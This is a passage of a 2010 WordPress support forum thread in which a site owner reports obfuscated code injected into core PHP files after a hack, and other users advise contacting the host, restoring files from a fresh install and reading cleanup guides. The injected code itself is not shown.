Title: Found some malicious code inside l10n.php Last modified: August 19, 2016 --- # Found some malicious code inside l10n.php * [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/) * I opened the l10n.php and found this encrypted code at the top of the file. It seemed malicious so i deleted this section immediately. Can someone help me decode this one? * `` Viewing 15 replies - 1 through 15 (of 39 total) 1 [2](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/page/2/?output_format=md) [3](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/page/3/?output_format=md) [→](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/page/2/?output_format=md) * Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751352) * Found similar code in the following files: * wp-includes/ * 1. kses.php 2. general-template.php 3. [more files] I’m currently check more affected files. * Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751353) * **UPDATE:** * almost every .php file on wp-includes were prepended with this code. I think this should be of high-priority for the wordpress developers. It might be a security hole for WordPress 3.0.1 * [Samuel B](https://wordpress.org/support/users/samboll/) * (@samboll) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751360) * it is a security hole in your server inform your host immediately as others are likely hacked then [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked) * [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) * [http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/](http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/) * Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751372) * I have already sent a report to my hosting provider. However, do you know any decryptor software or something that might help in decoding that code? * I think the code above translates to something which took advantage of the http. php and formatting.php. * I will submit the code tomorrow to the research team at the anti-virus company where I am currently taking my internship. Maybe they could help. * [Samuel B](https://wordpress.org/support/users/samboll/) * (@samboll) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751381) * I did decrypt the code but will not post it for obvious reasons I certainly encourage you to do it on your own, however * Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751382) * **UPDATE:** * The site redirects to _insomniaboldinfocom.com_. A very high alexa rank website.** Warning!** Don’t visit the site. Google search results showed that it might be malicious. * Does anyone know here where i can report for a site take down? * [Samuel B](https://wordpress.org/support/users/samboll/) * (@samboll) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751391) * get the whois info and report it to their host * ``` Domain Name: INSOMNIABOLDINFOCOM.COM Registrar: BIZCN.COM, INC. Whois Server: whois.bizcn.com Referral URL: http://www.bizcn.com Name Server: NS1.HOPERJOPER.RU Name Server: NS2.HOPERJOPER.RU Status: clientDeleteProhibited Status: clientTransferProhibited Updated Date: 15-oct-2010 Creation Date: 15-oct-2010 Expiration Date: 15-oct-2011 ``` * well that won’t work as `bizcn.com` is a malware site, also with russian dns likely won’t be able to do much about it * Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751392) * I don’t know how to decrypt such code. The only thing i can understand is that it is inside a tag and will run server side. * Can you send me your decrypt results at [cipals15@gmail.com](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/cipals15@gmail.com?output_format=md)? Thanks. * [Samuel B](https://wordpress.org/support/users/samboll/) * (@samboll) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751395) * no – sorry I won’t send the code as it wouldn’t be ethical you could send it to your host to alert them and see if they will give it to you * Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751397) * The site was only created several weeks ago. Grr.. I hate those bloody hackers. * And yeah, one of my tasks at my internship is to collect files from .ru and . bg sites which seemed to produce a large volume of excellent malware and virus applications. * I have checked my .htaccess file and the code seems not malicious. Please confirm: * ``` # BEGIN WordPress RewriteEngine On RewriteBase / RewriteRule ^index\.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] # END WordPress ``` * [Samuel B](https://wordpress.org/support/users/samboll/) * (@samboll) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751398) * that is normal code * Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751403) * I think there’s is nothing more i can do. Thanks for the inputs. * I’ve already done a backup of both wordpress files and the database. * This attack cost me about $30 – $50 (that’s small.. i know). But it is still money that i’m losing. * Currently, overwriting all wp-includes file with new files from a fresh install wordpress. * I’ll update soon if found more malicious activities. I will be checking logs. * Thread Starter [cipals15](https://wordpress.org/support/users/cipals15/) * (@cipals15) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751406) * **UPDATE:** * Can’t overwrite **class-http.php** after copying new files. Can someone explain to me briefly the function of this php file? * **UPDATE 2:** * a. Found out that my _cache_ folder has a web-permission: **Write**. b. Found this malicious file .nfs00000000010fea6a000647f3 which only contains the code( as mentioned above). * [Samuel B](https://wordpress.org/support/users/samboll/) * (@samboll) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751409) * delete it completely and upload one from a fresh zip * what the file does: * ``` Standardizes the HTTP requests for WordPress. Handles cookies, gzip encoding and decoding, chunk * decoding, if HTTP 1.1 and various other difficult HTTP protocol implementations. * * @link http://trac.wordpress.org/ticket/4779 HTTP API Proposal ``` * [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/) * (@rvoodoo) * [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/#post-1751410) * [http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html](http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html) * will help you out I think Viewing 15 replies - 1 through 15 (of 39 total) 1 [2](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/page/2/?output_format=md) [3](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/page/3/?output_format=md) [→](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/page/2/?output_format=md) The topic ‘Found some malicious code inside l10n.php’ is closed to new replies. * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/) * 39 replies * 4 participants * Last reply from: [AITpro](https://wordpress.org/support/users/aitpro/) * Last activity: [15 years, 7 months ago](https://wordpress.org/support/topic/found-some-malicious-code-inside-l10nphp/page/3/#post-1751545) * Status: not resolved ## Topics ### Topics with no replies ### Non-support topics ### Resolved topics ### Unresolved topics ### All topics